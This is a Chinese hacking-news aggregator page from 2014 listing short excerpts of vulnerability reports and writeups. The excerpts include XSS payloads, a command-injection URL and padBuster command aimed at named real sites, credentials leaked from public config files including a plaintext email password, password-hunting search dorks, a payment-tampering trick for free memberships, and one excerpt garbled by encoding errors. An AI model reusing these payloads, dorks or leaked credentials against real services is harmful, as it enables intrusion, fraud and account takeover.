记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

信息安全意识培训-在网络上保护好自己

引子在这样混乱的互联网上,军阀割据的地盘中,你根本身不由己,当你接入互联网或陌生人的那一刻,你的隐私就失控了。拿到你隐私的坏蛋,他们可以偷窥你,可以诈骗你或你身边的人,可以利用你的隐私做出下三滥的事。他们不会可怜你,你得学几招保护自己,保护你重要的人……注:我准备不断更新这个页面,给出最靠谱实在的建议,时间与精力原因,我会逐渐完善之,如果你有什么好的建议可以留言给我。页面永久链接:http://evilcos.me/yinsi.html在开始了解保护招数前,首先默念下面这条准则3遍:互联网那头和你聊天的可能是只狗。念完了?这是一条简单粗暴却道出了人性本质的准则。为什么这样说呢?互联网是人类创造的,人性在里面表现得淋漓尽致,曾经线下的坑蒙拐骗偷都搬到了互联网上,而互联网对于绝大多数人来说还是很神秘的玩意,在这个神
发布时间:2014-07-25 13:40 | 阅读:150 | 评论:0 | 标签:信息安全 安全意识

无声杯 xss 挑战赛 writeup

年龄越来越大,记性越来越差。就当做笔记吧(所有 POC 都只是为了通关)。 1. FB-0 这一关没什么可说的,直接给出 POC: http://sandbox.host.smartgslb.com/fb0/xss1.php?code=</script><svg/onload=alert(1)// 2. FB-01 这一关只有有个坑就是 正则 name=name.replace(/</,"&lt;"); replace 没有使用全局 g 参数,造成只会替换字符串中的第一个 "<" 符号,所以这关的 POC: http://sandbox.host.smartgslb.com/fb1/#code=<<svg/onload=alert(1)> 3. F
发布时间:2014-07-25 12:50 | 阅读:230 | 评论:0 | 标签:web安全 技术分享 xss

土豆网敏感信息泄漏(内部数据库配置以及邮箱密码)

https://github.com/wujiajun/juzhai-static/blob/e9ede9094a69a38feea6499272034e5078d3f64d/static/build.property.xml<!-- 发布的服务器参数 --><!-- product环境 --><property name="product.server" value="192.168.3.197"/><property name="product.username" value=""/><property name="product.password" va
发布时间:2014-07-25 09:50 | 阅读:183 | 评论:0 | 标签:无

绕过搜狐补丁继续命令执行

今晚本来想看看昨天提的sohu的那个命令执行 看他是怎么修补的。没成想http://officeimg.focus.cn/ 这个站整个毙掉了。访问直接403然后我google了下 又找到一个 sohu的站 同样的参数。然后执行http://office.focus.cn/park/search.php?city_code=110000&region_code=0&loopline=&business_circles=&property=&sale_status=0&office_name=$%7B@phpinfo()%7D发现没出来信息。看了下源码发现 把in替换了。经测试 发现 单引号也都过滤了。不过这样就可以绕过http://office.focus.cn/
发布时间:2014-07-25 02:40 | 阅读:389 | 评论:0 | 标签:无

寻医问药任意用户登入漏洞

如下图。这个漏洞比较奇怪。在修改完数值后,需要点击加入任意一个病友圈,然后从网站首页,到各二级域名频道如(论坛、商城、积分兑换)之类的都跳一遍,然后再回到病友圈。 漏洞证明:发了帖子测试了。你们删一下。。 修复方案:另外,如果在修改完数值后,到处一顿乱跳,还没复现的话,可私信我~
发布时间:2014-07-25 02:40 | 阅读:458 | 评论:0 | 标签:漏洞

WEB应用漏洞: - Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities

Wordpress Video Gallery####################### Exploit Title : Wordpress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities# Exploit Author : Claudio Viviani# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip ( Fixed : )# Dork Google: in
发布时间:2014-07-25 02:15 | 阅读:364 | 评论:0 | 标签:webapps

DDOS漏洞: - BulletProof FTP Client 2010 - Buffer Overflow (SEH)

#-----------------------------------------------------------------------------## Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) ## Date: Jul 24 2014 ## Exploit Author: Gabor Seljan ## Software Link: http://www.bpftp.com/
发布时间:2014-07-25 02:15 | 阅读:249 | 评论:0 | 标签:dos

WEB应用漏洞: - Lian Li NAS - Multiple Vulnerabilities

# Exploit Title: Lian Li NAS Multiple vulnerabilities# Date: 21/07/2014# Exploit Author: pws# Vendor Homepage: http://www.lian-li.com/en/dt_portfolio_category/nas/# Firmware Link: https://www.dropbox.com/s/imvkndl8m5yj7qp/G5S604121826700.tar.gz# Tested on: Latest version# CVE : None yet1. Hardcoded cookie to access the admin sectionFile: /javascript/storlib.
发布时间:2014-07-25 02:15 | 阅读:271 | 评论:0 | 标签:webapps

讨论:关于手机话费套现的问题,手机的电话费如何套现?

弱弱的问下,话费套现的问题。。。嘿ME (http://zhangtory.com) | 2014-07-21 16:33冲了话费若干,怎么套现?短信代扣费之类的怎么弄?我想可以通过类似手机游戏充值的方法套现,但是不知道具体怎么做啊,求详情。[原文地址]各种吐槽:1#胖子 (臣妾做不到哇) | 2014-07-21 16:34卖卡2#1c3z (我读书少,你可别骗我!) | 2014-07-21 16:34进了移动的口,还想让他吐出来??3#胖子 (臣妾做不到哇) | 2014-07-21 16:35先给我充点QB再来一堆钻吧4#随时回来 (我们做一些很酷的事,去改变世界) | 2014-07-21 16:42很难感觉 顺便补一句 楼下没有小鸡鸡5#从容 (快点交出0day,我保证不砍死你- -.) | 201
发布时间:2014-07-24 21:55 | 阅读:654 | 评论:0 | 标签:无

百度某处泄漏敏感信息(包括开发机密码等)

问题出在googlecode上,其实对于批量扫描的时候,这些绝对可以拿来做密码字典来遍历。以下一些都是通过googlecode出来的东西:site:googlecode.com intext:baidu.com pass //这里为什么用pass而不用password,因为我发现password更精确,也就是说会错过不少更好的东西,一些开发人员为图简约极致,往往喜欢简写。譬如username 简写成user password简写成pass。当然这里我仅仅只是举例,还有一些什么常用,又非常危险的关键字呢?大概整理一些可能不全:pwduserusernamepasspasswordrsyncftpsvnweb.xmlconfigtomcatApacheiissystemuser_namepass_word以上,类似
发布时间:2014-07-24 19:30 | 阅读:476 | 评论:0 | 标签:无

友情测试科大讯飞系统#7(呵呵,再忽略以后就不会提了)

先让我用个暴漫表达下我的心情。开讲:之前进了你们好多分站,你们表示很淡定,所以我立志要进主站内网。所以我的目标定到了www.iflytek.com。 主站不过DNS域传送的漏洞,相信提了你们也会忽略,但是在这说下,你们自己让技术人员学习下。学习链接:http://www.wooyun.org/searchbug.php?q=DNS%E5%9F%9F%E4%BC%A0%E9%80%81 还是从主站入手,查查主站的旁站。看到上面图 红色的网站。安徽省工商联。 其实我不大明白这个和讯飞有什么关联,但是经过ping,确定确实用了同一个公网ip。目测他们是你的客户?(入侵是从这里的开始的,后面我会证明这和讯飞有很大关系,要是你真的觉得和讯飞没有关系,那就把这个漏洞转给cncert ,而你也千万别修复,让工商联修复,
发布时间:2014-07-24 19:30 | 阅读:427 | 评论:0 | 标签:无

奇艺padding oracle文件读取漏洞

padding oracle文件读取漏洞./padBuster.pl http://tide.iqiyi.com/WebResource.axd?d=XMQ9NVUp8W3Nas4YbO6SLg2 XMQ9NVUp8W3Nas4YbO6SLg2 16 -encoding 3 -plaintext "|||~/Web.config" -prefix XMQ9NVUp8W3Nas4YbO6SLg2./Web.config_bruter.pl http://tide.iqiyi.com/ScriptResource.axd gb25MYvKoLBUr6zadAbxtAAAAAAAAAAAAAAAAAAAAAA1 16 漏洞证明: 修复方案:<configuration><syst
发布时间:2014-07-24 19:30 | 阅读:687 | 评论:0 | 标签:漏洞

申通路由信息预报系统命令执行漏洞

http://222.66.39.212:8081/rims/login!.actionTarget: http://222.66.39.212:8081/rims/login!.actionWhoami: usrtomcatWebPath: /t01/apache-tomcat-7.0.40/webapps/rims/ 漏洞证明:http://222.66.39.212:8081/rims/login!.actionTarget: http://222.66.39.212:8081/rims/login!.actionWhoami: usrtomcatWebPath: /t01/apache-tomcat-7.0.40/webapps/rims/ 修复方案:你比我懂的
发布时间:2014-07-24 19:30 | 阅读:495 | 评论:0 | 标签:漏洞

优酷、土豆敏感信息泄露(大量每日运营数据和数据库)

https://github.com/youkugems/m-cms-for-tudou-tv/blob/4d2093ed698c94b25d71e1eb50521a9fffd836d5/config/settings.yml.examplenotifier: email_username: "notifier-of-push-ops" email_password: 'bigbigTREE123' full_email: "Notifier <notifier-of-push-ops@youku.com>" address: 'smtp.youku.com' port: 25 authentication:
发布时间:2014-07-24 19:30 | 阅读:231 | 评论:0 | 标签:无

1元钱无限期开通迅雷普通/白金/钻石会员

只需要1元钱,即可无限期开通迅雷普通/白金/钻石会员。⊙﹏⊙ 漏洞证明:首先打开充值页面,我们选择修改页面元素,例如把6个月,修改为239个月,如下图:然后我们勾选这个修改过的选项,再勾选这个加1元购买其他服务的选项,你就会发现价格变为1元了!然后我们选择支付方式。(这里测试使用的是支付宝,按找到其他通用)如下图:支付完成后,我们返回迅雷会员的支付页面,点击支付成功!嗯。。显示出来了。。。 修复方案:加强逻辑判断
发布时间:2014-07-24 19:30 | 阅读:592 | 评论:0 | 标签:无

中国菜刀的另一种妙用

  这个方法是本?偶依锩唤煌?训氖焙蛭抟庵蟹⑾值摹<堑玫笔币购诜绺撸?瓤取2欢嗥ɑ傲恕F涫稻褪欠⑾植说?a href="http://www.hackdig.com/os/liulanqi/" target="_blank" class="keylink">浏览器的功能可以修改cookies。于是我就想到了cookies注入。  这里本?庞靡桓龃嬖?ookies注入的aspcms的程序演示一下,希望大虾们不要喷本?拧?br />       ?潘勘亲娓嫠弑?牛?蚵砣?耸?潘康囊幌蜃龇ǎ?魑?桓龃垦?车?潘靠隙ㄒ?虻摹?br />  然后右键——扩展功能就能看到修改cookies的
发布时间:2014-07-24 18:05 | 阅读:328 | 评论:0 | 标签:无

Destoon 20140530最新版超全局变量覆盖导致的安全问题(官方demo演示)

短时间没找到合适的注入 找了个任意文件读取发上来了 代码片段0x1 /common.inc.php行17foreach(array('_POST', '_GET', '_COOKIE') as $__R) {if($$__R) { foreach($$__R as $__k => $__v) { if(isset($$__k) && $$__k == $__v) unset($$__k); } }}   这里的逻辑是 如果 post get cookie 请求中的$$key和$value相等 就unset掉$$key 如果我们向1.php?x=1提交一个POST请求 内容为_GET[x]=1&
发布时间:2014-07-24 18:05 | 阅读:543 | 评论:0 | 标签:无

sql注入在线检测(sqlmapapi)

之前一搞渗透的同事问我,sqlmapapi.py是干啥的,我猜很多人都玩过sqlmap,但玩过sqlmapapi的应该比较少,今天就和大家一起看看如何使用以及一些美的地方。说白了,sqlmapapi.py就是提供了一个检查sql注入的接口,我们可以直接通过发送http请求扫描sql注入,获取扫描结果等一系列操作。下面通过实例演示如何使用:一.启动服务器端服务器后端使用的是bottle,一个Python Web微框架。二. 我们使用requests这个库发送请求.发送扫描选项,开启扫描:那个cd92e4e99406715b就是新建任务返回的taskid3.查看扫描状态       任务已经结束,可以获取扫描结果了4.查看扫描结果我们很明显的看出是存在sql注入的嘿嘿,是不是
发布时间:2014-07-24 18:05 | 阅读:341 | 评论:0 | 标签:注入

公告

❤ 手机版地址:wap.hackdig.com
❤ 如果您觉得本站不错,请推荐给您的朋友!

工具

广而告知

标签云